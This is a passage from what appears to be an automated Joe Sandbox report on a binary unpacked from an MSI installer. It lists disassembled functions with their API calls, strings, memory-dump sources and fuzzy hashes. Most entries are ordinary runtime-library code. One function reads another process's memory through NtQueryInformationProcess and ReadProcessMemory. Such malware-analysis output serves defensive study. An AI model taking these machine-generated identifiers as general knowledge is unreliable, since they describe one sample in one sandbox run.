                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,7642E7B1,?,?,?), ref: 002F43EF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandle$Process$OpenTimes
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1711917922-0
                                                                                                                                            • Opcode ID: fb7b516672f2ee61403fcdcf3306061b4407f3d5cbbbff5415f932ddd2cef7b7
                                                                                                                                            • Instruction ID: b9e6cd0d06303437d1750104f6e597203583aedd6fdfb9d2ccb39a07d7d7f6ee
                                                                                                                                            • Opcode Fuzzy Hash: fb7b516672f2ee61403fcdcf3306061b4407f3d5cbbbff5415f932ddd2cef7b7
                                                                                                                                            • Instruction Fuzzy Hash: E5518D70D11619EBDB15DF98C984BEEFBF8BF48754F244269E610BB280C7B45D018BA4
                                                                                                                                            Function 0030BBBD Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030BBC4
                                                                                                                                              • Part of subcall function 0030254E: __EH_prolog3.LIBCMT ref: 00302555
                                                                                                                                              • Part of subcall function 0030254E: std::_Lockit::_Lockit.LIBCPMT ref: 0030255F
                                                                                                                                              • Part of subcall function 0030254E: std::_Lockit::~_Lockit.LIBCPMT ref: 003025D0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                            • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                            • API String ID: 1538362411-2891247106
                                                                                                                                            • Opcode ID: 0ef55e5a46bb1f605d0606ba63371d2e2e26d38ddb001df49dd30bc65dd7da7e
                                                                                                                                            • Instruction ID: e959bda4cedaa1340627cb9409bbc4c24162d5e07ed58e6a43c27f4abf482ee0
                                                                                                                                            • Opcode Fuzzy Hash: 0ef55e5a46bb1f605d0606ba63371d2e2e26d38ddb001df49dd30bc65dd7da7e
                                                                                                                                            • Instruction Fuzzy Hash: B0B1BE7250120AAFDF1BDF68CD79EFEBBA9EB04304F054119FA06A66D1D7318A10DB60
                                                                                                                                            Function 00310C9D Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00310CA4
                                                                                                                                              • Part of subcall function 002F9270: std::_Lockit::_Lockit.LIBCPMT ref: 002F92A0
                                                                                                                                              • Part of subcall function 002F9270: std::_Lockit::_Lockit.LIBCPMT ref: 002F92C2
                                                                                                                                              • Part of subcall function 002F9270: std::_Lockit::~_Lockit.LIBCPMT ref: 002F92EA
                                                                                                                                              • Part of subcall function 002F9270: std::_Lockit::~_Lockit.LIBCPMT ref: 002F9422
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                            • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                            • API String ID: 1383202999-2891247106
                                                                                                                                            • Opcode ID: 936524fb4544a0e7f731455e4fe91e291ed12fd9be2360cfa2f2f30d0d49bdfc
                                                                                                                                            • Instruction ID: 3520fd7319a253a4a2b0378006e53ba63a4d6c591b3e06fbee608b8f9ceb5f0b
                                                                                                                                            • Opcode Fuzzy Hash: 936524fb4544a0e7f731455e4fe91e291ed12fd9be2360cfa2f2f30d0d49bdfc
                                                                                                                                            • Instruction Fuzzy Hash: ACB1DF7550020AAFCF2FDFA8C956DFE3BA9FB0C304F150419FA06A6691D6719AD1CB60
                                                                                                                                            Function 0030BF7E Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030BF85
                                                                                                                                              • Part of subcall function 002F8610: std::_Lockit::_Lockit.LIBCPMT ref: 002F8657
                                                                                                                                              • Part of subcall function 002F8610: std::_Lockit::_Lockit.LIBCPMT ref: 002F8679
                                                                                                                                              • Part of subcall function 002F8610: std::_Lockit::~_Lockit.LIBCPMT ref: 002F86A1
                                                                                                                                              • Part of subcall function 002F8610: std::_Lockit::~_Lockit.LIBCPMT ref: 002F880E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                            • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                            • API String ID: 1383202999-2891247106
                                                                                                                                            • Opcode ID: 6c499aacc5df9b586405a5e1cfaff54e551e94e08c816b9cea67992b9cb196df
                                                                                                                                            • Instruction ID: 0ae7b1750fa9cbf8dd67589797605c2197cf400aa876b95efa45cdc5ca8a3153
                                                                                                                                            • Opcode Fuzzy Hash: 6c499aacc5df9b586405a5e1cfaff54e551e94e08c816b9cea67992b9cb196df
                                                                                                                                            • Instruction Fuzzy Hash: C4B1B07551110AAFCF1BDFA8C976DFE3BB9EB08340F115619FA02A66D2D631CA10DB50
                                                                                                                                            Function 002F3C20 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 225libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 002F36D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 002F3735
                                                                                                                                              • Part of subcall function 002F36D0: _wcschr.LIBVCRUNTIME ref: 002F37C6
                                                                                                                                            • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 002F3CA8
                                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,000001D8,00000000,00000000,00000018,00000000), ref: 002F3D01
                                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,00000048,00000000,?,000001D8,00000000,00000000,00000018,00000000), ref: 002F3D7A
                                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,?,?,?,00000048,00000000,?,000001D8), ref: 002F3EB1
                                                                                                                                            • GetLastError.KERNEL32 ref: 002F3F34
                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 002F3F7B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MemoryProcessRead$AddressDirectoryErrorFreeLastLibraryProcSystem_wcschr
                                                                                                                                            • String ID: NtQueryInformationProcess$14
                                                                                                                                            • API String ID: 566592816-1595157856
                                                                                                                                            • Opcode ID: b03251b7317c1bf001d463de2193c0a3322c4079e69e915cb26163caa7d28289
                                                                                                                                            • Instruction ID: 5541fc2af993727f4874b0b84d2921b9bd19bd4888f60ff8b3e178b8f284b999
                                                                                                                                            • Opcode Fuzzy Hash: b03251b7317c1bf001d463de2193c0a3322c4079e69e915cb26163caa7d28289
                                                                                                                                            • Instruction Fuzzy Hash: B1A16A70D15649DEDB20CF64CC49BAEFBF4BF48304F2045A9D549A7280E7B5AA88CF91
                                                                                                                                            Function 00313F20 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 122COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00313F57
                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00313F5F
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00313FE8
                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00314013
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00314068
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                            • String ID: 21$TG1$csm
                                                                                                                                            • API String ID: 1170836740-680810872
                                                                                                                                            • Opcode ID: 0726102b12f27c8be4439cc445123695f377af57f282b806a1c256da009dacc5
                                                                                                                                            • Instruction ID: 53806feeeecfce5c58da4dfa5923a819fdcc840fd7a6608295808b3aabd13024
                                                                                                                                            • Opcode Fuzzy Hash: 0726102b12f27c8be4439cc445123695f377af57f282b806a1c256da009dacc5
                                                                                                                                            • Instruction Fuzzy Hash: 26418234E002099BCF1ADF68C881ADEBBB5BF4C314F148055E914AB392D731EE96CB91
                                                                                                                                            Function 00308555 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0030855C
                                                                                                                                            • _Maklocstr.LIBCPMT ref: 003085C5
                                                                                                                                            • _Maklocstr.LIBCPMT ref: 003085D7
                                                                                                                                            • _Maklocchr.LIBCPMT ref: 003085EF
                                                                                                                                            • _Maklocchr.LIBCPMT ref: 003085FF
                                                                                                                                            • _Getvals.LIBCPMT ref: 00308621
                                                                                                                                              • Part of subcall function 00301CD4: _Maklocchr.LIBCPMT ref: 00301D03
                                                                                                                                              • Part of subcall function 00301CD4: _Maklocchr.LIBCPMT ref: 00301D19
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                                                            • String ID: false$true
                                                                                                                                            • API String ID: 3549167292-2658103896
                                                                                                                                            • Opcode ID: f02e00df19704ebc09290755efe102e6ce0c67fd81b5c46e5086d153b356b838
                                                                                                                                            • Instruction ID: 470a628cc831c3d2ebc87a1a7e9838ce9a99c24a679c3d4a9c23365334b8ddf8
                                                                                                                                            • Opcode Fuzzy Hash: f02e00df19704ebc09290755efe102e6ce0c67fd81b5c46e5086d153b356b838
                                                                                                                                            • Instruction Fuzzy Hash: 7C2162B2D01318ABDF16EFA5D895ADF7BB8AF05710F00855AF9059F182DA70D540CBA1
                                                                                                                                            Function 002F9730 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 398COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • std::locale::_Init.LIBCPMT ref: 002F9763
                                                                                                                                              • Part of subcall function 00300C94: __EH_prolog3.LIBCMT ref: 00300C9B
                                                                                                                                              • Part of subcall function 00300C94: std::_Lockit::_Lockit.LIBCPMT ref: 00300CA6
                                                                                                                                              • Part of subcall function 00300C94: std::locale::_Setgloballocale.LIBCPMT ref: 00300CC1
                                                                                                                                              • Part of subcall function 00300C94: std::_Lockit::~_Lockit.LIBCPMT ref: 00300D17
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002F978A
                                                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 002F97F0
                                                                                                                                            • std::locale::_Locimp::_Makeloc.LIBCPMT ref: 002F984A
                                                                                                                                              • Part of subcall function 002FF57A: __EH_prolog3.LIBCMT ref: 002FF581
                                                                                                                                              • Part of subcall function 002FF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 002FF5C8
                                                                                                                                              • Part of subcall function 002FF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 002FF620
                                                                                                                                              • Part of subcall function 002FF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 002FF654
                                                                                                                                              • Part of subcall function 002FF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 002FF6A8
                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,?,003454B1,00000000), ref: 002F99BF
                                                                                                                                            • __cftoe.LIBCMT ref: 002F9B0B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::locale::_$Locimp::_$AddfacLocimp_std::_$Lockit$H_prolog3Lockit::_$FreeInitLocalLocinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocale__cftoe
                                                                                                                                            • String ID: bad locale name
                                                                                                                                            • API String ID: 3103716676-1405518554
                                                                                                                                            • Opcode ID: 69e009ed16c3cfe8b717a1fa098c61d358d5b27021e5c67ee8e68fbf08975319
                                                                                                                                            • Instruction ID: 6037b742f5757c233a0897d41178d129ee6d5a8b3ce3160d7bc4807a535f1613
                                                                                                                                            • Opcode Fuzzy Hash: 69e009ed16c3cfe8b717a1fa098c61d358d5b27021e5c67ee8e68fbf08975319
                                                                                                                                            • Instruction Fuzzy Hash: 11F1CC70D10249DFDB15CFA8C984BEEFBB5EF09344F244169E905AB381E771AA54CBA0
                                                                                                                                            Function 003272FB Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00327632,00000021,FlsSetValue,0033BD58,0033BD60,?,?,00325955,00000006,000000FF,?,00316CE7,00000000,A82), ref: 003273BC
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                            • String ID: A82$api-ms-$ext-ms-
                                                                                                                                            • API String ID: 3664257935-4249869218
                                                                                                                                            • Opcode ID: 4702ccef3b470efb2984656c28ded2642d165b69897fed164962f7d3782111e6
                                                                                                                                            • Instruction ID: dfc91b97f0198c16c69f2f533a0d6e121ead1a91a8ec354b86052345826ff4bd
                                                                                                                                            • Opcode Fuzzy Hash: 4702ccef3b470efb2984656c28ded2642d165b69897fed164962f7d3782111e6
                                                                                                                                            • Instruction Fuzzy Hash: 0A21D57AA09221EBD733DB65BC81A9A376CFF42770F250514EE05A7290DB30ED00D6E0
                                                                                                                                            Function 002F40B0 Relevance: 12.2, APIs: 8, Instructions: 233memorytimeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,40000022,7642E7B1,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 002F4154
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,3FFFFFFF,7642E7B1,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 002F4177
                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 002F4217
                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,7642E7B1,?,?,?), ref: 002F42D2
                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,?,7642E7B1,?,?,?), ref: 002F42F3
                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,7642E7B1,?,?,?), ref: 002F4326
                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,7642E7B1,?,?,?), ref: 002F4337
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,7642E7B1,?,?,?), ref: 002F4355
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,7642E7B1,?,?,?), ref: 002F4371
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$Local$AllocCloseHandleOpenTimes$Free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1424318461-0
                                                                                                                                            • Opcode ID: 0cfbf713204f203e9e4b92189e2a2892f5fc2c80837d71c844285d46831e90ae
                                                                                                                                            • Instruction ID: af8002e4006b3c2adf8fdc386420993273cee8c24cb6f8e45543334d64146a3b
                                                                                                                                            • Opcode Fuzzy Hash: 0cfbf713204f203e9e4b92189e2a2892f5fc2c80837d71c844285d46831e90ae
                                                                                                                                            • Instruction Fuzzy Hash: F581A271A102099FDB15DFA8C985BAEFBB4FB48350F244239EA25E7390D770AD50CB90
                                                                                                                                            Function 0031266D Relevance: 12.2, APIs: 8, Instructions: 224COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetCPInfo.KERNEL32(?,?,?,?,?), ref: 003126F8
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00312786
                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 003127B0
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003127F8
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00312812
                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00312838
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00312875
                                                                                                                                            • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00312892
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3603178046-0
                                                                                                                                            • Opcode ID: 867391bfa5e754d71af99f7fc45df4645eee7fd5dd986b680a734cccb25643f9
                                                                                                                                            • Instruction ID: 5c2efea5006ea2ec31580733afb51d256a0c93e7af5edc77b07aac3c03a2f107
                                                                                                                                            • Opcode Fuzzy Hash: 867391bfa5e754d71af99f7fc45df4645eee7fd5dd986b680a734cccb25643f9
                                                                                                                                            • Instruction Fuzzy Hash: E071817590024AAFDF2B9F64CC85AEF7BBAAF4D750F260019F904A6191D735C9A0CB60
                                                                                                                                            Function 0031215A Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 003121A3
                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 003121CF
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0031220E
                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0031222B
                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0031226A
                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00312287
                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003122C9
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 003122EC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2040435927-0
                                                                                                                                            • Opcode ID: 7599b45732e7a0cdc925eb6dfd096b9b8d011e397bd2d514eabd67cd3c89d357
                                                                                                                                            • Instruction ID: 73de026ae080f5d102159098d102f34a769d74c88f2a7f7d02484f3b96c21eed
                                                                                                                                            • Opcode Fuzzy Hash: 7599b45732e7a0cdc925eb6dfd096b9b8d011e397bd2d514eabd67cd3c89d357
                                                                                                                                            • Instruction Fuzzy Hash: CA51C17260020ABFDB2A8F64CC45FEF7BA9EF48740F124824FE11AA150D734DDA19B60
                                                                                                                                            Function 002F8610 Relevance: 10.7, APIs: 7, Instructions: 157memoryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002F8657
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002F8679
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002F86A1
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000044,00000000,7642E7B1,?,00000000), ref: 002F86F9
                                                                                                                                            • __Getctype.LIBCPMT ref: 002F877B
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 002F87E4
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002F880E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
